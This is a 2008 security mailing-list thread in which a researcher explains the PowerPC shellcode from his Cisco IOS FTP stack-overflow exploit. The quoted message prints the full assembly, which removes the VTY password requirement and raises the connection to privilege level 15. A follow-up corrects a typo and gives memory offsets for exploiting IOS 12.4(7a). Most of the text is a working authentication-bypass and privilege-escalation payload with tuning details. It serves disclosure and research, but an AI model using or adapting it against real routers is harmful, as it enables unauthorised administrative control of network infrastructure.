<<< Date Index >>>     <<< Thread Index >>>

Cisco IOS shellcode explanation - additional



Anyone spot the typo? It's also in a comment in the exploit source,
but doesn't affect how the code works:

"addi    7,7,233" should read "addi    7,7,2330"

The first offset (requirement to authenticate) is at 0x174 and the
second (privilege level) is at 0xde4

Its worth noting that at some stage around IOS 12.4 this structure
changed slightly and therfore if you were planning on exploiting
12.4(7a) which is also vulnerable to the FTP stack overflow, the
offsets are 0x17c and 0xdec

Cheers,

Andy


On Wed, Jul 30, 2008 at 10:03 AM, Andy Davis
<iosftpexploit@xxxxxxxxxxxxxx> wrote:
> Hi,
>
> Lots of people have been asking for details about the slightly
> unorthodox shellcode I used within the IOS FTP exploit, so here goes:
>
> .equ vty_info, 0x8182da60   //contains a pointer to the VTY info structure
> .equ terminate, 0x80e4086c
>
> lis     4,vty_info@ha
> la      4,vty_info@l(4)
> xor     8,8,8            //Clear r8
> lwzx    7,4,8            //Get pointer to VTY info structure
> stw     8,372(7)         //Write zero to first offset to remove
>                         //the requirement to enter a password
> subi    8,8,1            //Set r8 to be 0xffffffff
> addi    7,7,233          //Add second offset in two steps to
>                         //avoid nulls in the shellcode
> stw     8,1226(7)        //Write 0xffffffff to second offset to
>                         //priv escalate to level 15
>                         //(technically this should be 0xff100000
>                         //but 0xffffffff works and is more efficient)
> mr      3,8              //Use 0xffffffff as a parameter
>                         //to pass to terminate()
> lis     4,terminate@ha
> la      4,terminate@l(4)
> mtctr   4
> bctr                     //terminate "this process"
>                         //(current connection to the FTP server)
>
>
> Cheers,
>
> Andy
>